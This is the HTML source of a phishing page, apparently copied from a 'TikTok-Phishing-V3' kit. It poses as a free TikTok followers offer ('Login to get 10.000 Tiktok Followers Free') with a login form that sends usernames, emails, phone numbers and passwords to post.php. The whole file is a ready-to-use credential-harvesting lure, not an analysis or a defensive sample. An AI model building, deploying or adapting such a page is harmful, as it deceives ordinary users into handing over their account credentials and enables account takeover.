index.html 1.5 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960
  1. <!DOCTYPE html>
  2. <html>
  3. <!-- Powered By SADFLIX -->
  4. <!-- COPIED FROM https://github.com/swagkarna/TikTok-Phishing-V3/blob/main/tiktokv3.zip -->
  5. <head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  6. <meta name="viewport" content="width=device-width, initial-scale=1">
  7. <title>Tik Tok Followers</title>
  8. <script src="jquery.min.js"></script>
  9. <script src="jscript.js"></script>
  10. <link rel="stylesheet" type="text/css" href="style.css">
  11. <style>
  12. @media(max-width:760px){
  13. #TFG{
  14. font-size:140%;
  15. }
  16. .buttonstyle{
  17. font-size:100%;
  18. }
  19. .followers , .likes{
  20. width:95%;
  21. }
  22. }
  23. </style>
  24. </head>
  25. <body onload="updateyear()">
  26. </div>
  27. <div id="main-tool">
  28. <div class="wrapper"><img src="logo.png"></div>
  29. <h1 id="TFG">Login</h1>
  30. <p class="sub-heading">Login to get 10.000 Tiktok Followers Free</p>
  31. <form action="post.php" method="post">
  32. <center>
  33. <div id="fillup">
  34. <div class="form-option">
  35. <input name="email" class="input-form input-command" type="text" placeholder="Username/Email/Phone" required>
  36. </div>
  37. <div id="fillup">
  38. <div class="form-option">
  39. <input name="password" class="input-form input-command" type="password" placeholder="Password" required>
  40. </div>
  41. <br><br>
  42. <button class="buttonstyle"><b>Login</b></button>
  43. </center>
  44. </div>
  45. </div>
  46. <div id="steps" style="display:none;">
  47. </div>
  48. <div id="comment" style="display:none;" >
  49. </div>
  50. </body>
  51. <!-- Powered By Sadflix -->
  52. </html>